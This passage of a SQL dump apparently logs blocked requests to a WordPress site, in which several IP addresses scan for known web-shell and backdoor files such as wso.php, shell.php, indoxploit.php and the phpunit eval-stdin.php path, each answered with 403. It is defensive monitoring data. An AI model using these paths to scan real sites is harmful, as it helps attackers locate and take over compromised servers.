\/2.28.1\"}','rRi8lJ2vNdUsTe19PpwakLhK',0,1673841575.2033,242,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','sKDRnSwdJOU2TiQke1Wgclj3',0,1673841587.3994,192,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','Eti2zvbyWYqklDHAXCjfnmG3',0,1673842696.7122,247,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','hvpeC2H1DqQG9zxMNJY87LFi',0,1673842708.3112,201,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','wpKch6eYRHzm8daNTClyLtJV',0,1673842709.4548,171,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','EVxcjtTUIO75o0C4rn2S1adb',0,1673842710.8931,225,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','FN97jIwvK6hCEUcAbQMyXVet',0,1673842713.2457,186,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','niH7f4OcU8wzlVWuQtNB2qk1',0,1673842714.6262,182,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','AC8lSHXumUGaDPnykZijpowL',0,1673842717.3423,204,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','vJ2jNCTIoFG9ZxpQlBiqfYLr',0,1673842718.8955,204,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','chTKSB3tQ0l7U9IWAm5fvHFY',0,1673842721.6402,183,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','Y91NpwFWDOla8AyzMS4rHjux',0,1673842724.2676,206,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','bkhJGg7iz6WASH5RNos1CTUu',0,1673842725.7176,172,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','UO7mFRJfPQX1ixkNheo3wnY0',0,1673842730.2117,196,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','8AJxZSdsQ0V2ButljMI1GgLY',0,1673842731.4135,205,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','bEF4ti3wpekC7ryfPUVZQ8MT',0,1673842733.0821,168,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','HIPxAZ9pvE2mlsbQuSaCKk3t',0,1673842734.6362,178,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','aM6AcQil8OD2b7dXJEx1ouPh',0,1673842735.8676,183,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','Tuavor4beCzQM1Rp7Ug29syn',0,1673842736.9836,181,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','ykovnb6YaBQuEgiMDsSwtLA1',0,1673842738.1873,159,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','4sFgf7QITr5ijud8HR0Vq6bN',0,1673842739.8832,169,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','BeCuIGHoYZJDPSgxlMpdwmU4',0,1673842741.0873,214,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','Zv8Pfd2whYDGSy9K3ENlt0be',0,1673842743.7353,167,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','eC1bsuH8RkjWMLJE9ly7xqFw',0,1673842745.2777,227,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','dnRu0Dg48iJmCTB6EXVZl1Ns',0,1673843340.4246,185,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','RFyPpt0YDanIQ9odxKjbO4UB',0,1673843341.6959,220,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','63DrOJheFksjPN5b8Zxvn2B4',0,1673843656.3902,1962,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','t71YX4g6Sr5lyTBnaN3PivmU',0,1673843658.7154,1695,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','CyDNcxR14WTdOMwr2Vf5i39B',0,1673843660.7374,1664,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','B6Qogy1KUfuXHq9j5dbRrLIe',0,1673843682.4668,2545,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','vrQ4HWgIf7uFUk9A8l1X2sMS',0,1673843685.3923,1941,'','GET',403,0,700,0,1,'',0),('154.246.0.207',2599813327,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','ny6uh7mrWgXqo8zEIP3v5OjY',0,1673843736.6343,2303,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','rgOSmaHws1q2h5pAnZPoMeYu',0,1673851611.6137,3472,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','JZQrR2DBVi0MuWKklzOIdECa',0,1673858072.0731,308,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','LpfR8h3AGn9kyJarwjt2qTNI',0,1673858073.3120,208,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','sbhdTM6pmIZE2gAt8K1R5D9c',0,1673858074.4424,169,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','PXGy8FR4J1oftK07nTkOHIm3',0,1673858075.5157,175,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','RwX0Ie1EctugUWLhNxqJFzGa',0,1673858076.6518,170,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','mSqEHunQ0D1zN2OPVkysT5eL',0,1673858077.7626,168,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','1PVtMfUG3ySeI8LqhTbR4vl9',0,1673858080.9567,183,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','TJLpqrsVP63jA7HBNEhcn5MW',0,1673858082.2698,185,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','5wWDzRJp6N4bqxt9lQerjXEB',0,1673858083.3660,185,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','KbecRLm9Z5H12gqQapvMDAXO',0,1673858085.6633,191,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','wHtxfmyG8pzLqVSuNC5eDTPo',0,1673858086.7501,168,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','DE67n4f5ViCjtz8e20IWdOAs',0,1673858089.8525,173,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','ftCBrbzex9joP8dnlqIY2OMK',0,1673858090.9468,165,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','lhwYd9y5aiGmnzg2MLQSj7bB',0,1673858092.4456,220,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','B3Qg48Uf0jO5ClT1DZGHxSua',0,1673858093.5744,170,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','AFIi7kmsDUtY3SzCJfxB4X09',0,1673858094.6376,182,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','61mhpDZuU0q7g4LkXOfzilnN',0,1673858096.3309,165,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','LbTcPn8z90DmMHjrJgiYux5K',0,1673858097.4190,176,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','mEpiA3o8ux16Cwz5bIrjDkZR',0,1673858098.5052,185,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','07lOTP2ZrLYezsDAfK1tCaRb',0,1673858099.5794,173,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','jbiV1q9Cx56hBY4mrX3wa0NM',0,1673858100.7218,244,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','UrpRmLe9IKwCqktvxiTlfoQJ',0,1673858101.8659,184,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vxaKiUjO25SLlqIub3hWg9rZ',0,1673863121.1628,275,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','bUV63W04uDnQN8gjrO12Bk7l',0,1673863126.7790,216,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','uVSewinm48TyghXQjZp2FEAr',0,1673863130.9764,232,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gFZQOWTeYNctxaVSUwK3zljP',0,1673863136.9885,195,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','di4Omrx1flVGAQ2L5uNgheRj',0,1673863252.0918,232,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gmf4n3txayAj6T9RIpcuPD8l',0,1673863270.3680,192,'','GET',403,0,700,0,1,'',0),('116.0.20.53',1946162229,'','https://dailyjolly.co.uk/wp-cc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','tpHE80f5BP3gizbky69schZX',0,1673863288.8224,200,'','GET',403,0,700,0,1,'',0),('116.0.20.53',1946162229,'','https://dailyjolly.co.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 YaBrowser\\/20.9.3.136 Yowser\\/2.5 Safari\\/537.36\"}','OvIfxoECJUHTYLtPDpsn93uh',0,1673863288.8775,198,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','U8f5WPCA04OH9vpTGoqQIMy3',0,1673863309.6082,239,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Qpm129hX0rM73HkuSd8Elact',0,1673863309.9714,176,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','L5qRj2lTiXkazHbU64Ct7Wvs',0,1673863318.5242,240,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gHmCVFd24fJcGNQbh8YK6l7T',0,1673863323.4082,189,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','CvkBTGX0pMVZNPlO46tes71z',0,1673863323.6487,170,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','tmjQ4ngKDoCMubkV8E3UhHqy',0,1673863333.9267,182,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','dMLuJY346sPTvZ1XKAlWEzQr',0,1673863349.2890,242,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','0M9moy2SHjsz7dYa1gL6ieCE',0,1673863435.7765,192,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','01haD9yoqnGcQYUti5A4Lkpv',0,1673863459.3556,228,'','GET',403,0,700,0,1,'',0),('91.191.209.106',1539297642,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ck8PobRaESfgWiAZD5sGrFLU',0,1673863533.0813,211,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','zpWnP2xH8SXbiCZhGr0mQqUe',0,1673883173.8800,174,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','l1T2PF4gG7Zp5ozRDqv0yBfw',0,1673883177.9163,211,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','07Ktw5FAE38f1zLTOUprBneV',0,1673883179.0678,207,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','xLpsQwkn763KvdfhZDbcGgtJ',0,1673883183.8984,197,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MOG6j8vrV4Kwe9yAucoN3h7Q',0,1673883184.4021,172,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rXoTYmvBafKtUydEL1H24pPQ',0,1673883186.7230,189,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','4MB6wnxHqu2S3TjmYOcNQIda',0,1673883187.8607,226,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','JfjkXnaALbwIBqWyc6uUshGx',0,1673883188.3995,165,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','eTNQybUDCdzHi7aLM02sGZhV',0,1673883189.5020,184,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Vwaby7UGLESe5vhp90F48oOP',0,1673883190.8302,206,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZUxKBe8dW2JnOMzqDYmwN0V6',0,1673883200.1081,217,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rfG92oODBWVw17TjEI8N5ixd',0,1673883204.8603,177,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','x6p3NUi7QeRytVFc2I8MZaDo',0,1673883206.3179,212,'','GET',403,0,700,0,1,'',0),('91.238.82.36',1542345252,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','O8oIrc1EbHQM67PepDs3XYqW',0,1673883546.7984,312,'','GET',403,0,700,0,1,'',0),('91.238.82.36',1542345252,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','3rzf27XWyUuIgOtdvxYlJaie',0,1673883639.0265,198,'','GET',403,0,700,0,1,'',0),('91.238.82.36',1542345252,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','W9CRQd3P4VHm5l0yNf6T2wGL',0,1673883641.0511,191,'','GET',403,0,700,0,1,'',0),('91.238.82.36',1542345252,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Waxf8SdmIMJptFRr9HDl7UQ6',0,1673883646.8275,200,'','GET',403,0,700,0,1,'',0),('91.238.82.36',1542345252,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','3GcRwYx7PyQTVagJjI4KEeBr',0,1673883647.3301,172,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','LnBI49d7PogOjZyEYeVh0cNx',0,1673883693.9908,208,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','4hOXMpbN6yPcAY7e5K20Wjum',0,1673883702.5244,209,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','1NZVEIw3QOAKgps5hubjTPc7',0,1673883703.0070,179,'','GET',403,0,700,0,1,'',0),('91.238.82.115',1542345331,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 